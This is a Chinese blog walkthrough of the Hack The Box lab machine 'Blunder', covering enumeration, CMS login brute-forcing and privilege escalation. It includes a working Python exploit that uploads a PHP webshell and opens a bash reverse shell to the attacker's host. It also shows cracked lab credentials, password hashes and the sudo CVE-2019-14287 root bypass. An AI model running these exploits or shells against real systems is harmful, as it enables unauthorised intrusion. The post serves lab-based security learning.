【Hack The Box】linux练习-- Blunder

最新推荐文章于 2024-09-04 18:45:20 发布
最新推荐文章于 2024-09-04 18:45:20 发布
阅读量240 收藏
点赞数
分类专栏: Hack The Box 文章标签: linux 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127983809
版权

HTB 学习笔记

【Hack The Box】linux练习-- Blunder

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月21日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

80

在这里插入图片描述页面也很简单,全都是博客

目录爆破
gobuster dir -u http://10.129.95.225/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x php

发现/admin
以及todo.txt
里面提到了一个
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

fergus也许是个用户名
去到/admin
在这里插入图片描述
并同时查找漏洞
目录爆破结果

登陆爆破

发现了很多漏洞。3.9.2最多
在这里插入图片描述而我们在源码中输入cms名字也可能找到版本信息
在这里插入图片描述
在页面源代码发现了版本信息

fergus用户名
cewl http://10.10.10.191 > wordlist 获得一个字典
fergus放到use.txt

利用刚才的exp来爆破,因为根据查阅资料,这个cms都携带自动锁定,而这些脚本大致上是利用的http中的标头传递密码信息,不过在这里不深究

python 48942.py -l http://10.129.95.225/admin/ -u use.txt -p wordlist

在这里插入图片描述

得到账号密码

fergus:RolandDeschain

接着利用rce的exp

python 48568.py -u http://10.129.95.225/admin/ -user fergus -pass RolandDeschain -c id

在这里插入图片描述但是没有成功
在这里插入图片描述
再找一个

#!/usr/bin/env python3

import netifaces as ni
import re
import requests


callback_ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr']
username = 'fergus'
password = 'RolandDeschain'
url = 'http://10.10.10.191'


s = requests.session()

# Login
resp = s.get(f'{url}/admin/')
csrf = re.findall('name="tokenCSRF" value="([0-9a-f]{32,})"', resp.text)[0]
s.post(f'{url}/admin/', allow_redirects=False,
        data = {'tokenCSRF': csrf, 'username': username, 'password': password, 'remember': 'true', 'save': ''})

# Get CSRF to upload images
resp = s.get(f'{url}/admin/new-content/index.php')
csrf = re.findall('\nvar tokenCSRF = "([0-9a-f]{32,})";', resp.text)[0]

# Upload webshell
form_data = {'images[]': ('0xdf.php', '<?php system($_REQUEST["cmd"]); ?>', 'image/png')}
data = {'uuid': 'junk',
        'tokenCSRF': csrf}
s.post(f'{url}/admin/ajax/upload-images', data=data, files=form_data, proxies={'http':'http://127.0.0.1:8080'}, allow_redirects=False)

# Upload .htaccess file
form_data = {'images[]': ('.htaccess', 'RewriteEngine off', 'image/png')}
s.post(f'{url}/admin/ajax/upload-images', data=data, files=form_data, proxies={'http':'http://127.0.0.1:8080'}, allow_redirects=False)

# Trigger Shell
resp = s.get(f'{url}/bl-content/tmp/0xdf.php', params={'cmd':f'bash -c "bash -i >& /dev/tcp/{callback_ip}/443 0>&1"'})

才用下面的脚本
成功拿到shell
在这里插入图片描述同样的作为一个www用户,我将在var目录下自习搜索
在www下的cms相似文件名的php脚本中我发现了凭据
在这里插入图片描述

"role": "admin",
        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
        
"role": "author",
        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",

但是解密不出来

在这里插入图片描述
在var/www/bludit-3.10.0a/bl-content/database
发现了别的用户

nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",

在这里插入图片描述

Password120

我们登陆

su hugo


sudo -l

在这里插入图片描述这意味着我可以运行 sudo /bin/bash作为除 root 以外的任何用户,这很遗憾,因为 root 是我想要运行它的用户

但是我们搜索一下
搜索的内容看下图的搜索框

CVE-2019-14287

在这里插入图片描述只要我们输入下面的命令,我们就会被视为根

谷歌第一条

sudo -u#-1 /bin/bash

在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
hackthebox - TartarSauce (考点:信息搜集/wp漏洞)(未完成)
冬萍子癸水
04-15 467
nmap 就一个80,里面一张酸酸乳样的照片 然后打开robots.txt,看到webservices似乎有很多料,点看看看未发现太多 同时,扫目录也发现了webservices 继续深挖,扫webservices里面还有啥。 看到wp。wordpress的简称 看到wp就要想到用wpscan扫他 wpscan --url http://10.10.10.88/webservices/wp ...
hackthebox - writeup(考点:信息搜集 & cms made simple安全 & staff组/pspy/修改脚本提权)
冬萍子癸水
05-18 967
1 扫描 22想到可能有ssh登录,80进web信息搜集。 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA) | 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:b
Hack The Box——Blunder
江左盟的博客
08-25 1万+
简介 信息收集 使用nmap快速扫描目标主机端口和服务,目标主机仅开启了80端口,运行这Apache httpd 2.4.41,操作系统为Ubuntu,内核可能为2.6.32,如图: 然后访问80端口web服务,发现是作者记录的一些文章,如图: 随手输入admin发现页面跳转到登录页面,如图: 测试发现不存在常用弱口令和SQL注入,使用Google搜索BLUDIT发现此CSM系统存在很多已知漏洞,如目录遍历、文件上传、代码执行和暴力破解绕过。前面三个漏洞都需要拥有用户名和密码才能.
Hack the box靶机 Blunder
菜浪马废的博客
09-20 435
-更新CMS -关闭FTP-完成 -删除旧用户-完成 -通知弗格斯,新博客需要图片-待定 fergus应该是用户名 找到登录界面 bludit 3.9.2爆破脚本 #!/usr/bin/env python3 import re import requests #from __future__ import print_function def open_ressources(file_path): return [item.replace("\n", "") for item in ope..
hackthebox 001 获取邀请码
kevinhanser
12-02 5003
本文记录 backthebox 学习使用和渗透测试的详细过程 简介 破解邀请码 ###1. 简介### 常听别人说练习渗透测试可以使用 backthebox 这个在线的实验室,然后很容易地找到了官网,但是主页没有登录的入口。 终于在页面的中间部分找到了 Jion HTB 按钮入口 之后就进入了邀请页面 看到需要邀请码,下面问题来了,邀请码从哪里弄到呢 ###2. 破解邀...
HackTheBox::Blunder
aya3t的博客
10-14 360
HackTheBox::Blunder
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
Blunder-开源
04-15
Blunder是用于分析Java中的链式异常的自动化工具。 这对于分类,生成自定义的错误消息以及可能的解决方案列表很有用。
Blunder Chess Tools-开源
04-27
与国际象棋有关的软件工具库。 当前包括一个完整的程序包,用于分析您的游戏,搜索错误和错过的机会,然后反复检查它们,从而改善您的游戏。
blunder:现代客户端 JavaScript 错误处理程序
05-31
错误 现代客户端 JavaScript 错误处理程序 安装 下载 、 、 版本或通过 NPM 安装: npm install @ryanmorr/blunder 用法 Blunder 提供了在浏览器中增强、分派、... // Send the error to the server report ( '/pat
faux-pas:一个简化Java功能编程错误处理的库
02-03
Faux pas名词,/fəʊpɑː/:blunder; 错误的步骤,错误的步骤 F辅助开关数p作为是一个库,适用于F unctional p在Java的在AGC处理简化了错误。 它修复了默认情况下Java Runtime中的任何功能接口均不允许抛出已检查...
blunder:ES6处理错误的组件
05-16
Blunder.js ES6处理错误的组件 import MultiError from "blunder" ; const multiError = new Blunder ( [ new Error ( "some error" ) , new Error ( "some other" ) ] ) ; //you can use an array or just one ...
Linux字符设备驱动 -- regulator子系统
xi_xix_i的博客
09-01 821
Linux驱动之Regulator子系统Linux 内核之电源篇(加载流程)regulator,翻译就是调节器。一些可以输出电流电压的设备可以使用该子系统。举个例子,一个PMIC有多路输出,每一路输出都可以给很多外设、芯片供电。那么每一路输出,我都可以认为他是一个regulator。
Linux【5】远程管理
最新发布
m0_68339197的博客
09-04 189
shutdown -r 重启。
Linux:vim编辑器的基本使用
2401_86544677的博客
09-04 463
当然,也可以直接删除。vim可以直接用键盘上的光标来上下左右移动,但正规的vim是用小写英文字母「h」、「j」、「k」、「i」,分别控制光标左、下、上、右移一格。」键,再输入您想寻找的字符,如果第一次找的关键字不是您想要的,可以一直 按「n」会往前寻找到您要的关键字为止。「#」:「#」号表示一个数字,在冒号后输入一个数字,再按回车键就会跳到该行了,如输入数字15, 再回车,就会跳到文章的第15行。「/关键字」: 先按「/」键,再输入您想寻找的字符,如果第一次找的关键字不是您想要的,可以一直按。
Linux---文件(2)---文件描述符&&缓冲区(语言级)
m0_75102051的博客
09-03 569
本文介绍Linux中的文件描述符和语言级缓冲区
实时Linux性能监控脚本:周期性自动统计CPU、内存和IO使用情况
promise524的博客
08-30 1034
Shell脚本实现每3秒钟监控系统的 CPU 占用率、内存使用情况、IO使用情况、每个 CPU 核心的占用率、CPU 占用率最高的前10个进程以及/opt目录的磁盘空间变化。
linux查找mysql日志
爱思考的People
08-30 607
MySQL的日志文件通常存储在数据库服务器的数据目录下,具体位置取决于MySQL的配置文件。# 查找MySQL配置文件# 查找MySQL日志文件。
C/C++ 获取 linux 的所有 USB声卡ID及其信息
lijian2017的博客
09-04 806
popen()在 Linux 下,要获取 USB 声卡的 ID 和名称信息,通常你需要结合多个系统命令和接口,因为 C/C++ 标准库本身并不直接提供这样的功能。下面我将给出一个大致的方向,展示如何通过执行系统命令或使用 Linux 特有的库来实现这一目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值